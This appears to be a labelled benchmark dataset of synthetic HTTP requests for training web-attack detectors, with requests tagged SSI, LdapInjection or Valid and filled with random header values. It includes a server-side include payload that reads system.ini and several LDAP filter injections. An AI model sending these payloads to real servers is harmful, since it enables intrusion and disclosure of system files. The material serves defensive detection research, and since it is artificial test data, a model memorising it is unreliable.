ETag: "hP6VFLNv.5ogTM8"
Expect: nsiuii=vEscmbj
From: bete@ulsn.uk
If-Modified-Since: Fri, 16 Sep 05 21:37:21 CET
If-Unmodified-Since: Thu, 21 Jun 07 17:55:44 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Aug 04 17:45:49 CET
Max-Forwards: 2
MIME-Version: 2.1
Pragma: eier=ie
Proxy-Authorization: Basic dFJEdGk6NVluZQ==
Authorization: ekg1s lchaffa3=iedira
Range: 257-
Referer: http://www.lmtss0i.com/1EsUi/otpe.php3
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 3.9; jo-eN; rv:9.1.5) Gecko/04937247
UA-CPU: 68000
UA-Disp: 158,739,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 483x5740
Via: 5.4 247.174.65.243, 6.9 www.nphc.png:4, FTP/0.5 130.131.111.10
Transfer-Encoding: gzip
Upgrade: vebunl/5.1
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27743
Start - Id: 40631
class: SSI
GET /oshv/oqN5wSxnMHF6sWhLZ8@/h.jqpMl_j/dHF-h4VoS39.Id1/luFMq4/0Sostbbae/bRFK3xaEpOl3geWaXRR1/laYse/tcuaCz3uuztFkqrlV9k/uncsn3t6eteo/haroriwgtjc3gMsln/8atL.5.jpg?dsnoeyatsc0ea=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&ex=4&vgsiabecnief=lp&pgsidsoh=eo%3Bui3%5Dogroup+by&prXcsrtd=42 HTTP/1.0
Host: 51.112.221.57
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: tlhDtaos='oestktf6'
Client-ip: 90.139.110.154
Cookie: rraoo=22520
Cookie2: $Version="00"
Date: Sun, 01 Jan 06 17:29:15 CET
ETag: "7VJuCsYpLjlxhDcl"
Expect: 100-continue
From: 0huf@noaNaeeh.cz
If-Modified-Since: Fri, 30 May 08 18:45:26 UTC
If-Unmodified-Since: Tue, 29 May 07 23:04:58 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Dec 04 24:39:31 GMT
Max-Forwards: 740
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: sazlte neuhunTs=Hdeoarhe
Authorization: Digest response="Ff9EC2B1e9fE4DADB141B3f349Fb2BAF"
Range: -916,268-761609,54-38396
Referer: /nleyDetr/rRI6hsi/Opnu.png
TE: trailers,gzip;q=0.5
Trailer: Trailer
User-Agent: Mozilla/0.7 (compatible; MSIE 0.7; Win 9x; eewr)
UA-Disp: 959,926,32
UA-OS: Win9x
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: deflate
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 793 www.tAdehm.html "tqeeqiTsmsat" "Sat, 08 Apr 06 21:20:58 GMT"
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40631
Start - Id: 38363
class: LdapInjection
GET /estssnevcvt8Rsq/mlZ5GfDGVahWc/seifaDiiGinu/u4By@X.tq-UtROo-_bY/ursbrppannbbsytm/yeuioae9soiwettmec/4eshse/oaeGoUATNzsgX9./tW6r2GO9HvQm78DO1rSt/rv.WbfjiSOk/tmm93INrCMqAcr95y.js?o7aD=3636&t5alyi1st=netcatmehalteexecyrpUo%3Fdo&gAns9pnoetcai=ftk35&v5nhmr8o7en=hd&ey=teeih&64Dh.H-0a=sddhlh%40mz&emeous5uscr5it=sDXC4koYf&mqtimcScril8p=7290%29%28%26%28objectClass%3DBi5%29%28%7C%28sn+++%3D++ua%29%28cn%3Dsd++J*%29%29&ATlckboUnia=1&oHi6eat=67&oPsEwn=kncemeaoc&tS3=iumtaet4pay HTTP/1.1
Host: 173.162.63.114:80
Connection: close
Accept: text/*, application/*, image/*
Accept-Charset: hz-gb-2312;q=0.0, x-mac-japanese;q=0.4, x-mac-turkish;q=0.8, windows-1254;q=0.5, cp-932;q=0.5
Accept-Encoding: gzip, identity;q=0.2
Accept-Language: 0nreee-srndt, Udecmr-7;q=0.8
Cache-Control: max-stale
Client-ip: 193.201.183.61
Cookie: CTRexecpasswdCHg=hoie;WMNUZE83TPM=iyohmITrnhsfuk
Cookie2: $Version="3"
Date: Wed, 09 Feb 05 15:34:53 GMT
ETag: "hV-qto-LnVx2CyqW"
Expect: 100-continue
From: ri1uNdit@reossclvd.be
If-Modified-Since: Fri, 27 Feb 04 02:01:10 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 87
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: Digest uri=/rryrfae/azuenL/tsor.pdf
Range: 84-89,256260-35,5-
Referer: http://ruyartt.com/a0e1gr/csp9r2/hiZtoe/uaAad3.mspx
TE: gzip,deflate;q=0.7,gzip
Trailer: If-Unmodified-Since
User-Agent: slunhs (uZZ5vP; tcSlMscZ)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 8.2 www.nxQa2r.js
Transfer-Encoding: identity
Upgrade: ooh/1.6, rCeq/8.8
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38363
Start - Id: 15823
class: Valid
GET /iFlJVtG9vi/6pSS/E50ohtacfmkwubetxows/trjerttwme4Nncud/atLKoNdd55Ub0vFj/eTserxroIm7cidaugs/srSbci/s8frVTh0vuKqnX7/tun7qi/yISFmsLiaTG.oXFw/ixrYSwWB/lev2@tbKPzerQ.cgi? HTTP/1.0
Host: 65.81.96.135:48
Connection: keep-alive
Accept: image/png, image/png;q=0.8, application/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 97.141.13.193
Cookie: litathLdtl7spil=aaemsabifhsoni;nm=2;bue3gnrqMitidse=t4raluftsied;sznsma=o eBsptolA2%;7Eaovmvd6csmrp=7are3tfSttviJt;tVWWlike4xidJ=h33F_U
Cookie2: $Version="7"
Date: Sat, 17 Mar 07 05:38:19 CET
ETag: "SrG7b_onwu-VOS-mmV1m"
Expect: 100-continue
From: garo@oerqtZ.st
If-Modified-Since: Mon, 16 Feb 09 14:51:48 GMT
If-Unmodified-Since: Fri, 17 Jun 05 06:33:27 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Oct 08 02:38:01 GMT
Max-Forwards: 500
MIME-Version: 6.0
Pragma: ft5l=g
Proxy-Authorization: Digest username="0nSl"
Authorization: Basic dDNycHJvZTp0dGxucnRt
Range: -63889,815-78,-958
Referer: http://www.hive.biz/e4lo/tnrx/efs4gigh/sEthsctK/cxhnu.pl
TE: gzip;q=0.2,deflate
Trailer: Max-Forwards
User-Agent: wJOA2r http://www.Lx5Aevi.st
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: FTP/3.6 www.lehgsto.png:7, FTP/5.7 www.RrME.jpg:23, FTP/1.2 9.17.216.55
Transfer-Encoding: compress
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 10.118.64.124
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15823
Start - Id: 13660
class: Valid
GET /eiGDl56ZeVqKBo/nM5r/5FphpsZXv/chy3.bm1.Gk6YxBF/oHy9az@yE9FVAl57bday/connectps5sL31/uanaDqa/et/lVcukYIVhUlWT/nqz_uygM7IbTHE/nttIiIectJrheen/im3hlZbTp9c.htm?Dh7ldsrse1=enyboot.inio%28ts%2F&vptqt=b&IecCTfh=anhttpsm&kel=thultdvin&beseio0e1f=en%3AtolaEb%24+i&GtDgH9TI=66&pn6lhcbhc=5&mqstnG=3359&k5Ol.4=993773&hsrerttt=r5l6&mp=3751 HTTP/1.1
Host: www.nbi9edi.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1253, windows-1251, ks_c_5601-1987
Accept-Encoding: compress, compress
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 148.192.91.169
Cookie: g4cNt=ldxFCKT
Cookie2: $Version="7"
Date: Fri, 05 Mar 10 21:36:00 CET
ETag: W/"MtO3PnVDFCE@uWlpM"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Thu, 15 Sep 05 08:13:00 GMT
If-Unmodified-Since: Fri, 05 Aug 05 17:16:06 UTC
If-Match: "ivqQ9tUFp7CF8.tQxA_a"
If-None-Match: *
If-Range: Sat, 28 Jul 07 11:54:45 GMT
Max-Forwards: 9928
MIME-Version: 2.2
Pragma: Oa=xi
Proxy-Authorization: Digest cnonce="eLtokse"
Authorization: NTLM aWFnbmV5bkloZWlocWUyZXNpaUpoMDZ1aWJlYXRsU2hlYw==
Range: -9083,20196-
Referer: http://heyin92n.net/oaEeiiei/sryyssr/une1e.swf
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: dnwstaiibuAttfmrghe
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x4906
Via: 2.6 www.Taiko1ee.html, 6.4 40.154.60.138:0
Transfer-Encoding: deflate
Upgrade: oiz/5.7, 4Whet/4.7, sdili/7.8
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 43.38.172.20
X-Serial-Number: 02500062912801761
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13660
Start - Id: 5825
class: Valid
POST /oRD0YB5hLklmZXP1/vCMWZYI08PQj_G8fMTG/oZ7BRPPU0l6RgX/t9hs13Hd2gTFMjO/Kjwunion-@6oCWUA8/tNIlXUX/iframex/tmsnttepeino/tfS_Cmzw-tQaz2lsqu/a3kx/r_uMz1Id1Ocj/nk0Qf63.html? HTTP/1.0
Content-Length: 79
Content-Language: 57tkI
Content-Encoding: identity
Content-Location: /eabtmil/el9iam/acrjkdo/ttSor/avsgn.conf
Content-MD5: U29ubXNSc3NscHRvZWhucg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Oct 09 03:09:33 CET
Last-Modified: Thu, 22 Apr 04 03:27:05 UTC
Host: www.aheh.net:80
Connection: keep-alive
Accept: text/plain;q=0.3, video/*;q=0.3, application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, identity, identity, compress;q=0.5, compress
Accept-Language: iisrt-sleIvnkl;q=0.2, ooy-yztt;q=0.9, stk-oqodye
Cache-Control: min-fresh=77
Client-ip: 109.157.141.38
Cookie: 4fEe=di2c4;alonqyshmkni=23;sQt3Tl7i=mcsgtImcxzri1tnnla
Cookie2: $Version="05"
Date: Mon, 04 Dec 06 13:26:41 GMT
ETag: "PtKseiqlAztH7Rsq"
Expect: De4wfa
From: uidosta@cHrc6eaEh.fr
If-Modified-Since: Sun, 29 Jan 06 06:56:05 GMT
If-Unmodified-Since: Mon, 18 Oct 04 07:37:46 UTC
If-Match: "ClSKCmduN@bpGgQtZk"
If-None-Match: *
If-Range: Sat, 05 Jan 08 06:56:43 GMT
Max-Forwards: 1
MIME-Version: 3.8
Pragma: w=u2ajsiiw
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Basic YWVlTjpldHA4Y2lt
Range: 54-33,-36
Referer: /eauoueI/atsH/qrri/odnhe/mtalgs.php4
TE: chunked,deflate;q=0.1,trailers
Trailer: Accept
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 9.2; 2l-tt; rv:9.6.7) Gecko/32138779
UA-CPU: MIPS
UA-Disp: 1618,105,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1021x7299
Via: FTP/2.4 109.49.117.200, FTP/6.2 49.119.77.181, LnyFe/7.5 14.44.126.39
Transfer-Encoding: gzip
Upgrade: rES/6.3
Warning: 755 www.nlkObec.css "1rjdirwgsHi" 
X-Forwarded-For: 238.36.196.14
X-Serial-Number: 8692230651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

pEn=3xSqWZM_D&cIirx6ntoxs=e6ih9gOttesfiee6&hohf5tEmss=dIqNsnZ@p&lhtreshgs6m=0

End - Id: 5825
Start - Id: 24612
class: Valid
GET /16ps4eB@K.pl?62seo3=63672&RnttEel=hMbkqwSG&1oto8e5f=1&qeU=clmrbeauL HTTP/1.1
Host: www.xqd8olo.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: anea9ic-1kp;q=0.8, r-Elx, N-ie04gt, alF4e6-a;q=0.4, ibUoa-0jc1s
Cache-Control: no-cache
Client-ip: 104.103.138.226
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="701"
Date: Thu, 07 Apr 05 24:24:19 GMT
ETag: W/"gxM-KAWB7.0f.MAhdFV"
Expect: era1oZ=eHtecr
From: tgmyAbC@mwndiie.gov
If-Modified-Since: Sun, 11 Feb 07 04:02:12 CET
If-Unmodified-Since: Thu, 17 Nov 05 24:21:24 CET
If-Match: "_@2BBR5Ou9HC2soT"
If-None-Match: *
If-Range: "P_nF9560HB4UyGwzmHCd"
Max-Forwards: 3
MIME-Version: 2.0
Pragma: 2nawr0='ufde4Fo6'
Proxy-Authorization: R9lOil aedc=l6achff
Authorization: Digest qop=auth-int
Range: -633614,846-,145-
Referer: /ohsl2/faou8/em46e2h/4oCkid/tWn5Z9ta.cgi
TE: gzip;q=0.0,gzip
Trailer: Host
User-Agent: py6ec6sx (l_TCYU-; eY8-IT; fUujjRE; ne10Xd@dP_)
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4948x889
Via: FTP/8.4 216.60.238.201, g6ieyy/0.2 www.aduhotoq.css
Transfer-Encoding: rhip; rwaenPy9=lnaothe
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 562281573568029685
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24612
Start - Id: 25513
class: Valid
GET /hgw4e6d/uFg-GIoyH/xt3v/oEfdayweeiee/ipAQfsvrw.tiff?wiseSo2Bu=ymgirtmp%3Clfywtgreplacee+n&u5reapy40He=%7Ciarlgselecto%28sam%26q+ftprej&waidziimtnaiHe=3679036069&e1e=iqQH5&aw3hfalaoi2tR8r=7&l9t=oRgu97jnyx.&fnenmdEat=m%3A%25ne%7C&egAeunqPoaliint=o1Oo7pb5tti&ne6alud=br&gfnQ@=mis&qclgp=82 HTTP/1.1
Host: 229.231.56.210
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8, euc-jp;q=0.2, windows-874;q=0.4, ks_c_5601-1987;q=0.7, cp-950;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 39.22.35.117
Cookie: ahoYeg6Esersh2=12456;3%uoqaw8=eimgd
Cookie2: $Version="8"
Date: Wed, 09 Nov 05 10:51:07 UTC
ETag: W/"Yb_tx9yG@Ad7Oyq"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Wed, 21 May 08 17:29:31 UTC
If-Unmodified-Since: Tue, 15 Feb 05 03:26:36 GMT
If-Match: *
If-None-Match: "-VgQLaA8v_-UI4lMSq"
If-Range: *
Max-Forwards: 41
MIME-Version: 1.0
Pragma: 0odtpoo='A7xmjNrd'
Proxy-Authorization: NTLM aWF0YWxzbmVtZ3EwZWl1MG5waXR3YXJkaXBIbm0wc3RuYmJhcnNlYnJjYg==
Authorization: Basic MHJkczp0dDFM
Range: 6-,950-89
Referer: http://trFeen8H.com/endde/udof/weJfQno.php3
TE: gzip
Trailer: Accept-Encoding
User-Agent: cth0tiomtoovtawhtj
UA-CPU: x86
UA-Disp: 0020,943,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5796x493
Via: hc5so/3.3 www.eizgr.htm:6, HTTP/6.3 www.93tele.jpeg
Transfer-Encoding: compress
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 33645142012185435
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25513
Start - Id: 16847
class: Valid
GET /erRpn3c5ehrX/w1edidarhnswex.html?eioth0c=r45t+t&nryS=uhaDf68cr&mwsf=7372848&aEe=%40Ws HTTP/1.1
Host: www.3Rbbndwoas.fr
Connection: npldeHn
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.6, euc-cn;q=0.9, x-mac-chinesetrad, iso-8859-7;q=0.7, iso-8859-15;q=0.2
Accept-Encoding: gzip
Accept-Language: tdQee4ed-Nofttd, nns-M5;q=0.0, n-tgt, chcLyepl-na;q=0.7
Cache-Control: no-transform
Client-ip: 164.171.117.126
Cookie: orcoba4dce=421;os3o=lfaes1Ni5onmfrdth;esHeullh=2d bl-tlOrio0rt;uiloleetaM=t71ey
Cookie2: $Version="853"
Date: Tue, 06 Jun 06 20:30:19 GMT
ETag: "eOSrYC3A0SBrq3b6zkC"
Expect: ustm
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Tue, 23 Nov 04 10:37:17 CET
If-Unmodified-Since: Fri, 01 Dec 06 17:47:55 UTC
If-Match: *
If-None-Match: "7dmelCWgLYe1LV0Zha"
If-Range: Fri, 20 Apr 07 01:14:42 UTC
Max-Forwards: 5369
MIME-Version: 1.2
Pragma: b='ima'
Proxy-Authorization: Basic cHNjaWVyZXE6ZWlvY24=
Authorization: Digest nc=5dFfD8B6
Range: 976166-09743,687-149662,4-
Referer: /aeahcuud/gylc6dr/s1emt.gif
TE: deflate,gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (compatible; ttc6NuoP; Linux i586; htyamn; notltdLart; dhEs5e)
UA-CPU: Sparc
UA-Disp: 054,6842,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 818x5345
Via: hhh/7.4 167.224.50.149:57, 6.3 120.67.59.244, HTTP/1.9 www.ujreR.css
Transfer-Encoding: noai
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 926077
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16847
Start - Id: 37289
class: LdapInjection
PUT /e1ssenetgtNto9i5/haaeteEaere/jj/eotdbreZ/aQNh/nayiseqn8nsthhonaih9/tvzxVNp/nodeRp9-GRu6G/i9eSQjyBDF/fIKx2l94rBcmk5/eIO9.css? HTTP/1.1
Content-Length: 83
Content-Language: rldsttrw,imn6o0ie
Content-Encoding: deflate
Content-Location: http://www.olEe.fr/3eefie.dll
Content-MD5: aHViaGluaWJBcXBKY2RUZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Dec 05 07:50:03 UTC
Last-Modified: Thu, 03 Mar 05 05:43:17 GMT
Host: 149.222.12.87:80
Connection: lvaumrms
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=01200
Client-ip: 31.194.13.102
Cookie: u7vcCidPtoGy=htlhM8ieQonoypuoyo;nttsWeoleenioy=mnasBaesudwU;Gz=tokU)(&(objectClass=  Tn*)
Cookie2: $Version="04"
Date: Mon, 24 Sep 07 14:47:13 CET
ETag: "aCZ6Pvv8NCat3t70"
Expect: 1olmhcu
From: UfphLeah@4nEt.uk
If-Modified-Since: Fri, 15 Feb 08 01:53:00 UTC
If-Unmodified-Since: Sat, 28 Feb 09 23:33:39 UTC
If-Match: *
If-None-Match: *
If-Range: "utac@7kZ3g@TG@cm4p"
Max-Forwards: 304
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="zhrjaeti"
Authorization: Basic TGhiZXI0YTozMUlm
Range: 850-3194,-90
Referer: http://noe0dnEI.biz/pDedf.mpeg
TE: trailers
Trailer: Accept-Encoding
User-Agent: er22nTPlt (a1bIH24t; he7Z6X2ItN; sCItqN4)
UA-CPU: Sparc
UA-Pixels: 3751x161
Via: HTTP/7.2 16.212.1.32, 6.7 55.132.147.117, smo/4.0 www.miro.css:09
Transfer-Encoding: gzip
Upgrade: hcbmpk/2.2, 6hrt/8.0, 9ynIoj/7.6, see/0.7, 8ere/1.7
Warning: 672 65.120.230.54 "tE8eliXe80zifabw" 
X-Forwarded-For: 229.176.95.66
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vrIcatO=vl3stmkr9oslo&h58jgnsbhndwadl=lioonylp&fWh=97165947&46TmAzV=Wetto4shlikenoh

End - Id: 37289
Start - Id: 33024
class: Valid
POST /ahc1cta3oR6/meoc_Y/eRHmuNjUo@72Fqx.29/njoYmp.NC/oA/ty4egliptiaeqthenih/systemncppasswdrV_M/_95NppQ/tfje.cfm? HTTP/1.1
Content-Length: 173
Content-Language: o
Content-Encoding: gzip
Content-Location: /9trstc3t/s1nta.cgi
Content-MD5: bmVzdG5zZTMwZWtvZWl6ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Apr 05 12:39:25 UTC
Last-Modified: Sun, 01 Jul 07 16:36:07 UTC
Host: 212.145.248.139:80
Connection: ssL9oho
Accept: text/html;q=0.2
Accept-Charset: cp-932, iso-8859-8-i, big5;q=0.3, macintosh;q=0.0, iso-8859-1
Accept-Encoding: *;q=0.7
Accept-Language: tesE-nm;q=0.9, t8Zno-oiog;q=0.6, Ok-R;q=0.6, a-sntrngid;q=0.0
Cache-Control: max-age=51
Client-ip: 75.232.39.149
Cookie: mtllgejro=0663;en8dubxsn=ala(c;th=OVn5i2emtsnN3srt;2oedrdhw4e=06;3jcmdXQwSFJP=nda|aettmpmocha@tcmd5ton
Cookie2: $Version="120"
Date: Thu, 29 May 08 05:32:24 UTC
ETag: W/"rHnwjd4MwLBr-ZVI2"
Expect: 100-continue
From: ihYUAw@ivSmbM.it
If-Modified-Since: Mon, 29 Aug 05 08:54:00 CET
If-Unmodified-Since: Wed, 01 Apr 09 24:05:24 CET
If-Match: *
If-None-Match: *
If-Range: "JgEfX7pCK3UeZLQQd"
Max-Forwards: 6058
MIME-Version: 0.6
Pragma: yl='nh'
Proxy-Authorization: Basic YmRDcWFlOmVnZWQ0bmU=
Authorization: Digest algorithm=iehrofze
Range: -653509,070-
Referer: http://e4jlsoh.com/trtte/uthliu.mpg
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.6 (compatible; rbhrcq; Linux i586; c1t3t)
UA-CPU: x86
UA-Disp: 4878,467,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 699x4175
Via: 6.1 www.ni5fttj.jpeg:7195, HTTP/5.1 25.209.24.244, HTTP/6.2 20.197.169.82
Transfer-Encoding: deflate
Upgrade: ceysO/0.3, sherw/9.0, 9Ojtfs/4.0, eslfme/3.1
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 101.97.72.137
X-Serial-Number: 01279486631284
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9a0pZ9group byBGZ=hdocumentastsD&tw1neik1xesiH=2&jn=tnlib(prinsert;aa4gnN]&Y-z4z12Rxhv= y R&roo1iad84hhirnw=i46zaxml2lcopybra &zi=84306112&E.jTCg19R=2&se64hUhrh=ioTioo

End - Id: 33024
Start - Id: 1527
class: Valid
GET /ccaBvAJM2j/dare6tehmReKfoUbaph/cC-jWBVQPbQ8/hEdh9wisDgieSbeevhia/teulS/vcRDIYI/Cu1GkW/tW7U1vUjw@a_M9Rr39AP.html?pheldswlo=e_BkM1f&bTDaisaSnmHUme1=3135634&harbitestgisdQn=%5Dzenp&ioa18ebn46emsep=oet3exoa&1leipiqed=t&naem1lvrlx4fee=d9RNeelaeseunaDalo&qK7o=6643&nph-Sr-fH2Z=7980 HTTP/1.1
Host: 104.251.155.138:7130
Connection: keep-alive
Accept: audio/*, video/mpeg;q=0.6, video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: identity, identity, deflate, gzip;q=0.7, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 17.253.204.167
Cookie: teeikscwzAagifo=023;odOr4di7sipto=02152;eai=n8dAOTiHMkkM
Cookie2: $Version="898"
Date: Sun, 25 Jan 09 02:29:13 CET
ETag: W/"7r89idM5FjKBqZ7y7G"
Expect: rChEbe3=ahdTi
From: sctinh@65Ad.st
If-Modified-Since: Fri, 30 Apr 10 11:29:43 UTC
If-Unmodified-Since: Wed, 20 Jan 10 12:40:40 UTC
If-Match: *
If-None-Match: "kof6Fj-69i7x4DoFBDMx"
If-Range: "who6oA6GCqUzMAP"
Max-Forwards: 42
MIME-Version: 7.1
Pragma: br='n6lxwcE6'
Proxy-Authorization: hhusoe ikNaeuH=urUeewe
Authorization: eehs isnwuhr=oiis
Range: -537132,4044-
Referer: /si8dottg/iohsn/eitS0aef/u59hd/4fWawfq.php3
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/2.0 (X11; U; SunOS sun4u 1.9; ge-ad; rv:2.3.3) Gecko/39848434
UA-CPU: PowerPC
UA-Disp: 422,3598,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4503x489
Via: 9.3 www.x9ecShe.js
Transfer-Encoding: compress
Upgrade: oona/0.9, wHted/5.5, mcbtI/0.9
Warning: 991 www.eesu.js "hhept" "Wed, 03 Nov 04 11:47:33 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 83526
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1527
Start - Id: 2583
class: Valid
GET /fi/erd/gbs.asp?npsAtedfniii7=989&aooMd=039392048&did=Rez5us0e HTTP/1.0
Host: 204.162.224.21
Connection: keep-alive
Accept: application/*, image/png;q=0.2
Accept-Charset: x-mac-ce, koi8-r, iso-8859-9;q=0.6
Accept-Encoding: gzip;q=0.5, compress, gzip
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 55.106.123.246
Cookie: llplyE=60;hlib.dyvn=xp_;esn3j=a7lgpfoH2e'r;eI6paNneNm=gw
Cookie2: $Version="64"
Date: Wed, 16 Jan 08 22:23:24 GMT
ETag: W/"VIXU5KySQEy1khxcK0P"
Expect: 100-continue
From: nenonte@ily8ueedor.uk
If-Modified-Since: Tue, 06 May 08 05:53:30 UTC
If-Unmodified-Since: Sat, 12 Sep 09 18:13:53 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jun 04 14:56:21 UTC
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM d3Nlc245ZW11cWFIaHRlY2x3ZnRNd0tlZ2RkbmFvN3hzbnI=
Authorization: qsiu cptrzbka=gdqrh4
Range: 9-6,46-1
Referer: http://www.aiLeveu.cz/sexaagm7/eyrjMt/u9aeErbd/bn3y/Vl0ybsFe.asmx
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: couhogT3aa3itnhna
UA-CPU: x86
UA-Disp: 0486,5217,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6067x8441
Via: 0.2 104.153.91.231
Transfer-Encoding: identity
Upgrade: hutie/7.1
Warning: 852 www.tmttloo.html "nksortaobujtnde9N" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2583
Start - Id: 7900
class: Valid
POST /oti7ea9iSnh/Y_na.xH9sperldr.php4? HTTP/1.0
Content-Length: 111
Content-Language: iaio
Content-Encoding: compress
Content-Location: http://eaotciea.be/itwyljue.dll
Content-MD5: Y3NFb3NhZHRvMThneHNveA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Apr 09 16:07:58 CET
Last-Modified: Sun, 24 Apr 05 24:15:00 CET
Host: www.oQoecfnodG.st:80
Connection: close
Accept: image/gif;q=0.4, application/*
Accept-Charset: big5
Accept-Encoding: gzip, gzip
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 194.50.167.30
Cookie: nztoaEpd=29649225
Cookie2: $Version="5"
Date: Sat, 06 Sep 08 04:38:51 CET
ETag: "li@ZzeqO08ih_0Dh"
Expect: eqinoots=Re6h;nn1bxghe
